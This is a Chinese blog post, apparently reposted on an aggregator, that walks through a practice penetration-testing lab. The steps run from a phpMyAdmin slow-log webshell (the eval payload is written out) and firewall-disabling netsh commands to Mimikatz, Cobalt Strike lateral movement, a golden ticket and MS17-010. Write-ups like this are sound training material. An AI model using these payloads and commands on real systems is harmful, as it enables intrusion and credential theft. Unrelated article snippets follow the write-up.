红日靶场1学习笔记

一、准备工作

1、靶场搭建

靶场地址
靶场描述
在这里插入图片描述靶场拓扑图
在这里插入图片描述
其他相关靶场搭建详情见靶场地址相关说明

2、靶场相关主机信息

后续打靶场的过程中,如果不是短时间内完成,可能ip会有变化

主机ip密码角色
win7192.168.122.131hongrisec@2019!边界服务器
win7192.168.52.143hongrisec@2019!边界服务器
win2008192.168.52.138hongrisec@2019#域控
win2003192.168.52.141hongrisec@2019!域成员
kali192.168.122.128攻击机1
win11192.168.122.1攻击机2

3、环境配置启动

启动win7的phpstudy
在这里插入图片描述win 7能通域内其他主机和互联网
在这里插入图片描述
win2008 不能通互联网
在这里插入图片描述

二、web渗透

1、IP及端口的探测

goby、nmap都可以
在这里插入图片描述

2、访问相关端口,可以发现phpinfo页面

在这里插入图片描述

3、进一步进行目录爆破,发现phpmyadmin目录

其他相关文章还写到扫出来了备份文件,对后续文件上传拿到文件路径有帮助,但是我这边没有扫出来,和字典有关
在这里插入图片描述

在这里插入图片描述

4、通过弱口令登录phpmyadmin,弱口令root:root

在这里插入图片描述

5、先修改一下弱口令

如果是攻防赛中可以进行这一步,这里有点多余了
在这里插入图片描述

6、百度大法,发现可以通过数据库写入webshell

phpMyAdmin 渗透利用总结
法一:
直接往web目录下写入webshell
需要的条件:a、有权限写 b、知道web目录绝对路径
查看当前数据库用户是否有写的权限

show variables like '%secure%';

secure-file-priv特性:
secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
当secure_file_priv的值为null ,表示限制mysql 不允许导入|导出
当secure_file_priv的值为/tmp/ ,表示限制mysql 的导入|导出只能发生在/tmp/目录下
当secure_file_priv的值没有具体值时,表示不对mysql 的导入|导出做限制
可以在mysql-ini文件中设置其属性
在这里插入图片描述此处权限为默认NULL,不允许导入导出文件,另寻他法
补充:
如何设置这一属性?
在这里插入图片描述

法二:通过日志文件写入webshell
条件:日志读写权限+web目录的绝对路径
查看当前选项值

show global variables like '%long_query_time%'

在这里插入图片描述开启日志记录功能

set global general_log = "ON";

在这里插入图片描述查看当前日志文件

show variables like 'general%';

在这里插入图片描述
指定日志文件,相关路径phpinfo页面可以看到

set global general_log_file = " C:/phpStudy/WWW/zshell.php";

在这里插入图片描述无法设置日志文件,另寻他法

法三:

尝试通过慢日志写入webshell
慢日志:一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中。

查询当前慢查询日志目录

show variables like '%slow%';

在这里插入图片描述

开启慢查询日志记录功能

set GLOBAL slow_query_log=on;

在这里插入图片描述指定慢查询日志文件
这里就可以成功,为啥上面不能成功?

set GLOBAL slow_query_log_file='C:/phpStudy/WWW/zshell.php';

在这里插入图片描述向慢查询日志中写入phpinfo页面

select "<?php phpinfo();?>" or sleep(11);

在这里插入图片描述查看该日志文件可以成功被解析
在这里插入图片描述进一步写入webshell

set GLOBAL slow_query_log_file='C:/phpStudy/WWW/shell.php';
select "<?php @eval($_POST['cmd']);?>" or sleep(11);

在这里插入图片描述

用蚁剑成功连接webshell
在这里插入图片描述在这里插入图片描述
至此,通过phpmyadmin获取到了web服务器的相关权限

http服务和数据库肯定是为网站服务的
发现数据库中存在newyxcms数据库,搜索相关信息,可以在网上发现源码和相关漏洞
在这里插入图片描述

7、访问相关web页面,进一步挖掘漏洞

前面修改了数据库的密码导致访问报错,又重新修改了密码

http://192.168.122.131/yxcms/
在这里插入图片描述通过公告信息,进入后台(默认弱口令)
在这里插入图片描述
在这里插入图片描述前台模板管理处新建模板文件写入webshell进行漏洞利用
在这里插入图片描述webshell 路径可以在公开源码中查看相关文件获取,也可以通过前面扫出来的网站源码获取,此处的版本和靶机cms的版本不同,但是文件路径一样,最好找相同版本的源码
在这里插入图片描述通过蚁剑连接webshell
![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/55655708ce4748e484611caef6416f8b.png)

留言板存在存储型xss,后台审核可触发
在这里插入图片描述其他文章中还提到了一个sql 注入漏洞,感兴趣的可以自行研究

三、后渗透

主要思路:通过cs生成木马上传到网站服务器进行下一步渗透,如域渗透和横向移动,权限提升和维持

1、通过蚁剑连接后,关闭防火墙

以防对后续测试造成影响,靶场有时候也很玄学

netsh advfirewall show allprofile state                   查看防火墙状态
netsh advfirewall set allprofiles state off 			   关闭防火墙

在这里插入图片描述

2、通过cs生成木马并用蚁剑上传到网站服务器上

在这里插入图片描述在cmd 中运行木马
在这里插入图片描述

3、主机上线后抓取用户名密码,进行内网存活主机端口扫描

抓取主机用户名密码,点击Run Mimikatz
在这里插入图片描述

在这里插入图片描述还可以直接进行提权在这里插入图片描述
在这里插入图片描述主机相关信息收集

net group /domain          域内用户列表net group "domain computers" /domain    域内计算机列表net group "domain admins" /domain       域内管理员列表hostname                                本机名称
net time /domain
查看时间,通过域控获取的时间,可以看到域控的主机名,ping一下可以获取域控的ipnet view
可以看到域里面的用户,ping 一下可以获取相关的ip

内网主机端口扫描
在这里插入图片描述发现存在另外两台主机:192.168.52.138、192.168.52.141
在这里插入图片描述查看域控,发现owa为域控

在这里插入图片描述

四、横向移动

1、搭建代理,进行端口转发

kali上开启frp 服务端
在这里插入图片描述将客户端通过蚁剑上传到win7上,但是一直无法启动
在这里插入图片描述看其他人可以成功,不知道什么问题,上传了这个dll文件也不行

2、通过SMB Beacon达到通内网的目的

网上说这是一个很隐蔽,可以绕过防火墙的好方法,咱也不懂,咱也不敢问
SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信
对同一台主机上的 Beacon 和跨网络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。
参考链接

创建一个新的SMB监听器

在这里插入图片描述
选择138的主机进行横向移动
在这里插入图片描述

138的主机成功上线,同样抓取密码,关闭防火墙
在这里插入图片描述在这里插入图片描述

3、权限维持(黄金票据)

把SID,域名,复制下来等下黄金票据要用

hash:58e91a5ac358d86513ab224312314061:::SID: S-1-5-20域名:GOD.ORG

通过黄金票据提权
原理链接
在这里插入图片描述回头再详细研究吧,先照猫画虎

右键->access->golden ticket

在这里插入图片描述

在这里插入图片描述基本上可以通过CS 一把梭了,怪不得说CS是神器

4、cs与msf 联动进行漏洞利用

其实不用cs直接用msf也可以达到目的,不过是各有各的优势,组合起来各取所长
kali端
在这里插入图片描述
cs端
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
获取msf反弹shell,设置代理隧道,使得msf能够通过win7路由转发访问192.168.25.0/24网段

shell     #相当于cmd
chcp 65001    #解决乱码
arp -a    #查看主机arp表信息

在这里插入图片描述
建隧道
在这里插入图片描述在这里插入图片描述在这里插入图片描述进一步利用ms17_010漏洞来探测攻击
在这里插入图片描述同样也发现141主机存在相同漏洞
在这里插入图片描述结束语:写到这里就结束了,一个靶场看起来不大,打起来还是有很多方法和注意的事项。比如说通内网的方法,有用frp的,还有用smb、写路由的,还有提权的各种方法,值得大家探索,毕竟多一种方法多一条路。靶场可以很快打完,但是写文章有时候也是比较麻烦的,不过这也算是一种修行。小小脚本小子,还需多多学习,写的不好的地方大家多多批评指正。还有七个靶场,继续加油!

每日名言:
别问兜里还有多少钱,就问你的青春还都多少年
苦难是生命的防沉迷系统
很多人看不到未来,其实是看到了未来
回忆不过是在时间的长河里刻舟求剑
我最新的照片,其实是我最老的照片

参考文章:
https://blog.csdn.net/qq_41821603/article/details/109948920
https://cloud.tencent.com/developer/article/1595245
https://blog.csdn.net/qq_52849046/article/details/139163010
https://blog.csdn.net/m0_66638011/article/details/139727914?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7Ebaidujs_baidulandingword%7ECtr-1-139727914-blog-136015522.235%5Ev43%5Epc_blog_bottom_relevance_base1&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7Ebaidujs_baidulandingword%7ECtr-1-139727914-blog-136015522.235%5Ev43%5Epc_blog_bottom_relevance_base1&utm_relevant_index=1

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/881312.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Linux学习笔记(七):磁盘的挂载与扩展

Linux学习笔记&#xff08;七&#xff09;&#xff1a;磁盘的挂载与扩展 在虚拟机环境中&#xff0c;当我们的存储空间不足时&#xff0c;添加一块新的硬盘显得尤为重要。 1. 新增磁盘 首先&#xff0c;你需要确保有一块物理磁盘或虚拟磁盘。在虚拟机管理器中&#xff0c;你可以…

PostgreSQL学习笔记二:PostgreSQL的系统架构

PostgreSQL 是一种功能强大的开源关系型数据库管理系统&#xff0c;其架构具有以下特点&#xff1a; 一、客户端/服务器架构 客户端 客户端可以是各种应用程序&#xff0c;如 Web 应用、桌面应用等&#xff0c;它们通过网络连接与 PostgreSQL 服务器进行通信。客户端使用标准的…

HTML图形

HTML图形 1. HTML5 Canvas2.HTML5 内联 SVG3.HTML 5 Canvas vs. SVG 1. HTML5 Canvas HTML5 的 canvas 元素使用 JavaScript 在网页上绘制图像。画布是一个矩形区域&#xff0c;您可以控制其每一像素。canvas 拥有多种绘制路径、矩形、圆形、字符以及添加图像的方法。 1、创建…

【pytorch】pytorch入门5:最大池化层(Pooling layers )

文章目录 前言一、定义概念 缩写二、参数三、最大池化操作四、使用步骤总结参考文献 前言 使用 B站小土堆课程 一、定义概念 缩写 池化&#xff08;Pooling&#xff09;是深度学习中常用的一种操作&#xff0c;用于降低卷积神经网络&#xff08;CNN&#xff09;或循环神经网…

微知-如何临时设置Linux系统时间?(date -s “2024-10-08 22:55:00“, time, hwclock, timedatectl)

背景 在tar解压包的时候经常出现时间不对&#xff0c;可以临时用date命令修改一下&#xff0c;也可以其他&#xff0c;本文主要介绍临时修改的方法 date命令修改 sudo date -s "2024-10-08 22:55:00"其他查看和修改的命令 本文只记录查看方式&#xff0c;修改的暂…

详解正确创建好SpringBoot项目后但是找不到Maven的问题

目录 问题 解决步骤&#xff1a; 找到File->Project Structure... 设置SDK 设置SDKs 问题 刚刚在使用IDEA专业版创建好SpringBoot项目后&#xff0c;发现上方导航栏的运行按钮是灰色的&#xff0c;而且左侧导航栏的pom.xml的图标颜色也不是正常的&#xff0c;与此同时我…

SpringBoot Jar 包加密防止反编译

今天看到了一个说明jar包加密的实现方式&#xff0c;特意试了下效果&#xff0c;并下载了插件源码及实现源码查看了下子&#xff0c;感兴趣的可以在最后得到gitee地址。 SpringBoot 程序 Jar 包加密的方式&#xff0c;通过代码加密可以实现无法反编译。应用场景就是当需要把公司…

Linux防火墙-案例(二)snatdnat

作者介绍&#xff1a;简历上没有一个精通的运维工程师。希望大家多多关注作者&#xff0c;下面的思维导图也是预计更新的内容和当前进度(不定时更新)。 我们经过上小章节讲了Linux的部分进阶命令&#xff0c;我们接下来一章节来讲讲Linux防火墙。由于目前以云服务器为主&#x…

脑机接口技术的未来与现状:Neuralink、机械手臂与视觉假体的突破

近年来&#xff0c;脑机接口&#xff08;BCI&#xff09;技术发展迅速&#xff0c;不仅限于科幻小说和电影&#xff0c;已经逐步进入现实应用。特别是马斯克的Neuralink公司推出的“盲视&#xff08;Blindsight&#xff09;”设备&#xff0c;最近获得了FDA的突破性设备认定&am…

Spring Boot:打造下一代医院管理系统

3系统分析 3.1可行性分析 通过对本医院管理系统实行的目的初步调查和分析&#xff0c;提出可行性方案并对其一一进行论证。我们在这里主要从技术可行性、经济可行性、操作可行性等方面进行分析。 3.1.1技术可行性 本医院管理系统采用JAVA作为开发语言&#xff0c;Spring Boot框…

动态规划算法题目练习——62.不同路径

1.题目解析 题目来源&#xff1a;62.不同路径——力扣 测试用例 2.算法原理 1.状态表示 这时由于避免越界初始化所以将左上角置为虚拟位置&#xff0c;创建一个二维dp表用来存储到当前为止的所有路径 2.状态转移方程 以dp[i,j]为例&#xff0c;起点到该位置的路径是起点到其上…

YOLO 二元分类器

YOLO 二元分类器 在评估二元分类器性能时&#xff0c;TP、FP、TN和FN是四个核心指标&#xff0c;它们分别代表真阳性、假阳性、真阴性和假阴性。以下是这些指标的定义、计算方法以及在实际应用中的意义&#xff1a; 定义 TP&#xff08;真阳性&#xff09;&#xff1a;模型正…

找不到concrt140.dll如何修复,快来试试这6种解决方法

concrt140.dll是微软Visual C 2015 Redistributable Package中的一个重要动态链接库文件&#xff0c;它在许多Windows应用程序中扮演着关键角色。本文将详细探讨concrt140.dll丢失的原因、影响、解决方法以及预防措施&#xff0c;帮助用户更好地理解和应对这一问题。 一、什么是…

【Verilog学习日常】—牛客网刷题—Verilog进阶挑战—VL45

异步FIFO 描述 请根据题目中给出的双口RAM代码和接口描述&#xff0c;实现异步FIFO&#xff0c;要求FIFO位宽和深度参数化可配置。 电路的接口如下图所示。 双口RAM端口说明&#xff1a; 端口名 I/O 描述 wclk input 写数据时钟 wenc input 写使能 waddr input 写…

算法知识点————贪心

贪心&#xff1a;只考虑局部最优解&#xff0c;不考虑全部最优解。有时候得不到最优解。 DP&#xff1a;考虑全局最优解。DP的特点&#xff1a;无后效性&#xff08;正在求解的时候不关心前面的解是怎么求的&#xff09;&#xff1b; 二者都是在求最优解的&#xff0c;都有最优…

Springboot 整合 durid

文章目录 Springboot 整合 druiddruid的优势配置参数使用整合 Druid配置数据源配置参数绑定配置参数配置监控页面配置拦截器 Springboot 整合 druid druid的优势 可以很好的监控 DB 池连接 和 SQL 的执行情况可以给数据库密码加密可以很方便的编写JDBC插件 配置参数 使用 整…

算法闭关修炼百题计划(四)

仅供个人复习 1.两数相加2.寻找峰值6.岛屿的最大面积3.最大数4.会议室5.最长连续序列6.寻找两个正序数组的中位数 1.两数相加 给你两个 非空 的链表&#xff0c;表示两个非负的整数。它们每位数字都是按照 逆序 的方式存储的&#xff0c;并且每个节点只能存储 一位 数字。 请…

.NET CORE程序发布IIS后报错误 500.19

发布IIS后浏览时报错误500.19&#xff0c;同时配置文件web.config的路径中也存在问号“?”。 可能原因&#xff1a;没有安装运行时

ViT(Vision Transformer详解)

Transformer作为前沿的深度学习框架&#xff0c;带有多模态的特性&#xff0c;对于不同类型的输入数据&#xff0c;不管是文本还是图像均可进行处理&#xff0c;而ViT则是对于Transformer中的视觉方面&#xff08;也就是输入数据为图像&#xff09;的衍生物&#xff08;因Trans…

MATLAB - 浮动基座机器人的逆运动学

系列文章目录 前言 本例演示如何解决以浮动底座为模型的机器人的逆运动学问题。浮动底座机器人可以在空间中自由平移和旋转&#xff0c;具有六个自由度。浮动基座机器人的逆运动学问题适用于空间应用&#xff0c;即使用安装在浮动和致动基座上的机械臂在空间操纵物体&#xff0…